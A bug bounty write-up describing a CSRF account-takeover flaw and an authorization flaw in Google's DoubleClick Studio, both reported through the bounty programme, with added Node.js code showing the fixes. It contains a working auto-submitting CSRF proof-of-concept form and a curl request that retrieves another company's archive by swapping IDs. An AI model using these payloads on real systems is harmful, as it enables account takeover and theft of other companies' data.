P1s in Google's main domain

I always wanted to take up a challenge and hit the security of very well-known companies; this time I've chosen Google!

Taking on such a big company as an individual hacker is a hard task: it has many acquisitions, services, products, etc., and choosing where to start is time- and effort-consuming too. Then I thought, why don't we take the challenge to a higher level?

DoubleClick Studio and motivation:

Google has an advertising product known as “DoubleClick Studio”. DoubleClick Studio is made to manage and organize the workflow of Google's DoubleClick Digital Marketing; with it you can manage the workflow of the data produced across Google Ads, Microsoft Advertisement Center and the Yahoo marketing platform.

The studio is hosted on Google's main domain, “google.com/doubleclick/studio/”, as it is a very important product, so any bug in it is a bug on google.com itself. That was enough to tickle my curiosity and start looking for the unwanted stuff.

What could possibly go wrong :

In the dashboard, a user of the company he runs ads for can create advertisements and their campaigns, and can invite other users with specific privileges to access these ads and campaigns on the platform.

I instantly started the proxy tool (Burp Suite) and began sniffing the requests and responses on that platform; after some effort I ended up finding:

A hacker can make himself an administrator of any company on the platform ($3133.7 bounty) and more:

Requests coming from the user's side were not checked for whether they were supplied by an external website or not, meaning an external website (attacker.dz) could make cross-site requests to the platform on behalf of any logged-in user, allowing the attacker to perform actions as that user. This is the well-known XSRF (cross-site request forgery) attack, so I started to see if it really existed!

The request to add a user looked like:

POST /doubleclick/studio/service HTTP/2
Host: google.com
Content-Type: application/json

{"service":"AdvertiserService","method":"create","arguments":["{\"accountId\":60021129,\"name\":\"Adam Test\",\"emailParams\":{\"to\":[\"AAAA\"],\"cc\":[\"the new user email\"],\"message\":\"AAAAAA' value='AAAAAAA\"}}"]}

plus some other headers, of course. Taking it a bit deeper, the backend was expecting a JSON object with the required parameters.

A cross-origin request cannot normally carry Content-Type: application/json: that content type is not CORS-safelisted, so the browser sends a preflight which the server must approve, and there was no CORS misconfiguration on the platform. An HTML form, on the other hand, can only submit application/x-www-form-urlencoded, multipart/form-data or text/plain without any preflight. So the question was: does the backend check whether the request content type is JSON or not?

And no, it didn't: we could send the request with any content type and the backend would not reject it, which leaves the platform in a vulnerable state. If we craft a request whose body is the required JSON, the request is accepted whatever the content type, and that can make the org owner add an arbitrary user just by opening a website. Proof of concept:

<!-- PoC page hosted on the attacker's site: auto-submits a text/plain form to the service endpoint; the browser attaches the victim's google.com cookies -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>

<form id="frm1" action="https://www.google.com/doubleclick/studio/service" method="post" enctype="text/plain">
  <!-- The ' value=' inside "message" closes the name attribute and opens the value attribute; the browser sends name=value, so the "=" lands inside the message string and the body stays valid JSON -->
  <input name='{"service":"AdvertiserService","method":"create","arguments":["{\"accountId\":60021129,\"name\":\"Adam Tesst\",\"emailParams\":{\"to\":[\"AAAA\"],\"cc\":[\"attacker email\"],\"message\":\"AAAAAA' value='AAAAAAA\"}}"]}' type="text">
  <input type="submit">
</form>

<!-- Submit the form as soon as the page loads (the form needs the id the selector refers to) -->
<script> $(document).ready(function(){ $("#frm1").submit(); }); </script>

Implementing this HTML/JS code on the attacker's website, once the victim (the org owner) opens the link, the attacker is instantly invited as an administrator of that company. Two details make the form work: with enctype="text/plain" the browser sends each field as name=value, and the ' value=' inside the message field closes the name attribute and starts a value attribute, so the = the browser inserts lands inside the "message" string and the body the server receives is still valid JSON; and the victim's accountId (here 60021129) is hard-coded in the form, so the attacker has to know it in advance. The attacker will later be able to:

  • access the ads and campaigns data (read/write access)

  • access users and their data (read/write)

  • access the company assets (read/write)

The other requests were vulnerable in the same way, meaning an attacker could also perform any other action without inviting himself (such as adding or deleting ads, etc.), so the XSRF affected the whole product.
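To make the mechanics concrete, here is an added example in Node.js (written for this page; it is not code from the original post or from Google). It rebuilds the body that the text/plain form above makes the browser send, feeds it to a model of the service endpoint with the behaviour described (any Content-Type accepted, body parsed as JSON), and then to a hardened version that requires application/json, checks Origin and Sec-Fetch-Site, and requires a per-session anti-CSRF token. The endpoint model, the attacker.dz origin, the X-CSRF-Token header name and the cookie/token values are assumptions for illustration.

```javascript
// Added example (not code from the original post or from Google): rebuilds the
// PoC form body and shows the server-side checks that would have rejected it.
// The endpoint model, attacker.dz origin, token header name and session values
// are assumptions for illustration.

// A form with enctype="text/plain" is sent as one "name=value" line per field,
// joined by CRLF and without percent-encoding.
function textPlainFormBody(fields) {
  return fields.map(([name, value]) => `${name}=${value}`).join('\r\n') + '\r\n';
}

// The single input of the PoC form: the `' value='` inside "message" closes the
// name attribute and opens the value attribute, so the "=" the browser inserts
// lands inside the message string and the body is still valid JSON.
const POC_NAME =
  '{"service":"AdvertiserService","method":"create","arguments":["{\\"accountId\\":60021129,' +
  '\\"name\\":\\"Adam Tesst\\",\\"emailParams\\":{\\"to\\":[\\"AAAA\\"],\\"cc\\":[\\"attacker email\\"],' +
  '\\"message\\":\\"AAAAAA';
const POC_VALUE = 'AAAAAAA\\"}}"]}';

// Request as the victim's browser would send it from attacker.dz (constructed).
function buildPocRequest() {
  return {
    headers: {
      'content-type': 'text/plain',
      'origin': 'https://attacker.dz',
      'sec-fetch-site': 'cross-site',
      'cookie': 'SID=victim-session', // attached automatically by the browser
    },
    body: textPlainFormBody([[POC_NAME, POC_VALUE]]),
  };
}

// Service envelope seen in the post: outer JSON, each argument itself a JSON string.
function parseServiceCall(body) {
  const outer = JSON.parse(body);
  return { service: outer.service, method: outer.method,
           args: outer.arguments.map((a) => JSON.parse(a)) };
}

// Behaviour the post describes: whatever the Content-Type, if the body parses
// as JSON the call is executed with the cookie's session.
function vulnerableDispatch(req) {
  try {
    return { accepted: true, call: parseServiceCall(req.body) };
  } catch (e) {
    return { accepted: false, reason: 'bad-json' };
  }
}

// Hardened dispatch: three defences, each of which alone stops an HTML-form CSRF.
function hardenedDispatch(req, policy) {
  const h = req.headers;
  const ct = (h['content-type'] || '').split(';')[0].trim().toLowerCase();
  // 1. Forms can only send application/x-www-form-urlencoded, multipart/form-data
  //    or text/plain; anything else needs a CORS preflight the server can refuse.
  if (ct !== 'application/json') return { accepted: false, reason: 'content-type' };
  // 2. Origin must name our own site (a missing Origin is refused as well), and
  //    Sec-Fetch-Site, when the browser sends it, must be same-origin.
  if (h['origin'] !== policy.allowedOrigin) return { accepted: false, reason: 'origin' };
  if (h['sec-fetch-site'] !== undefined && h['sec-fetch-site'] !== 'same-origin') {
    return { accepted: false, reason: 'sec-fetch-site' };
  }
  // 3. Per-session anti-CSRF token echoed in a custom header (assumed name).
  if (h['x-csrf-token'] !== policy.sessionToken) return { accepted: false, reason: 'csrf-token' };
  return vulnerableDispatch(req);
}

// Legitimate call as the real dashboard would make it (constructed).
function buildLegitRequest(policy) {
  const inner = { accountId: 60021129, name: 'Adam Test',
                  emailParams: { to: ['AAAA'], cc: ['new user email'], message: 'hello' } };
  return {
    headers: { 'content-type': 'application/json', 'origin': policy.allowedOrigin,
               'sec-fetch-site': 'same-origin', 'x-csrf-token': policy.sessionToken,
               'cookie': 'SID=victim-session' },
    body: JSON.stringify({ service: 'AdvertiserService', method: 'create',
                           arguments: [JSON.stringify(inner)] }),
  };
}

const POLICY = { allowedOrigin: 'https://www.google.com', sessionToken: 'tok-123' };

console.log(vulnerableDispatch(buildPocRequest()).call.args[0].emailParams); // cc: [ 'attacker email' ], message: 'AAAAAA=AAAAAAA'
console.log(hardenedDispatch(buildPocRequest(), POLICY).reason);            // content-type
```

Run it with node; the vulnerable model happily creates the attacker's invitation from the text/plain body, while the hardened one refuses at the content-type check before even parsing. The Origin and token checks are kept as independent layers because a content-type check on its own is only as good as every handler remembering to apply it.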

Google immediately accepted the bug and assessed it as P1 (first-priority issue).

Within a couple of weeks they rewarded me with a bounty of $3133.7 (which stands for ELITE).

Authorization issue allowed access to sensitive files of other companies (duplicate):

Looking further into the platform, I noticed that it handles many organizations, users, projects, campaigns, etc. Sniffing the requests to see how it manages them, I saw that the backend takes the ID parameter of every request and edits that object directly. It came to mind that there must be some entanglement in the design, so I made another account and started playing around with IDs, for example editing the campaign of accountA from accountB and so on.

At some point I found that the backend wasn't really checking authorization on the “download user attachments” feature. The platform allows its users to download their campaign data as a ZIP file containing the images, PDF files and documents uploaded to the campaign, and that allowed attackers to access other companies' attachments holding sensitive content. This can be done with just a curl request (sent with the attacker's own session):

curl --data '{"service":"CreativeService","method":"getDownloadArchiveUrl","arguments":["60105989","61744772"]}' -XPOST https://www.google.com/doubleclick/studio/service -H "Content-Type:text/plain"

As an attacker you just have to change the arguments array to the victim's IDs and the server immediately gives back the ZIP file location.
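As an added example (not the platform's code, written for this page), the following Node.js snippet models the object-level authorization check the post says was missing on CreativeService.getDownloadArchiveUrl: the caller's session must be a member of the account named in the arguments, and the creative must belong to that account, so that a member of one account cannot pair their own accountId with another account's creative ID. The account membership table, e-mail addresses, role names and archive URL layout are constructed for illustration.

```javascript
// Added example (not the platform's code): object-level authorization for the
// getDownloadArchiveUrl call. Account/creative IDs, members and the archive URL
// layout below are constructed sample data.

// Two accounts, each with its own members and creatives (constructed). The IDs
// of the first account are the ones from the curl request in the post.
const ACCOUNTS = {
  '60105989': { members: { 'alice@example.com': 'admin' }, creatives: new Set(['61744772']) },
  '60021129': { members: { 'mallory@example.com': 'admin' }, creatives: new Set(['62000001']) },
};

// Hypothetical archive location; the real service returned some storage URL.
function archiveUrl(accountId, creativeId) {
  return `https://storage.example/archives/${accountId}/${creativeId}.zip`;
}

// Vulnerable behaviour the post describes: trusts the IDs in "arguments" and
// never asks who is calling.
function getDownloadArchiveUrlVulnerable(session, args) {
  const [accountId, creativeId] = args.map(String);
  return archiveUrl(accountId, creativeId);
}

// Hardened: (1) the account must exist, (2) the caller must be a member of it,
// (3) the creative must belong to that same account. Unknown and foreign
// creatives both get 404 so the response does not confirm that an ID exists.
function getDownloadArchiveUrlHardened(session, args) {
  const [accountId, creativeId] = args.map(String);
  const account = ACCOUNTS[accountId];
  if (!account) return { ok: false, status: 404 };
  if (!Object.prototype.hasOwnProperty.call(account.members, session.user)) {
    return { ok: false, status: 403 };
  }
  if (!account.creatives.has(creativeId)) return { ok: false, status: 404 };
  return { ok: true, url: archiveUrl(accountId, creativeId) };
}

// Dispatcher mirroring the {"service","method","arguments"} envelope from the post.
function handleService(session, body) {
  const { service, method, arguments: args } = JSON.parse(body);
  if (service === 'CreativeService' && method === 'getDownloadArchiveUrl') {
    return getDownloadArchiveUrlHardened(session, args);
  }
  return { ok: false, status: 404 };
}

const MALLORY = { user: 'mallory@example.com' };
const VICTIM_CALL = JSON.stringify({ service: 'CreativeService', method: 'getDownloadArchiveUrl',
                                     arguments: ['60105989', '61744772'] });
console.log(getDownloadArchiveUrlVulnerable(MALLORY, ['60105989', '61744772'])); // victim's ZIP URL
console.log(handleService(MALLORY, VICTIM_CALL));                                 // { ok: false, status: 403 }
```

The membership lookup is the check that was missing; the third check matters as well, because a resource lookup keyed only on the creative ID would let an authorized member of any account fetch any creative simply by passing their own accountId.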

The report was sent, but it had already been reported by another researcher.

At that point I unlocked a new achievement, “Hack a Google product”, and it really was an interesting experience for me. At the time my ranking among Google hackers was 251st, and it has since gone back to 468th place as I haven't been active for over a year.

See the link to my profile:

That’s it for now,

Thanks for the time you've taken to read this report, and I hope you enjoyed it and discovered something new!

Credit to Aymen BenMalek and Sohaib Naceri for their assistance
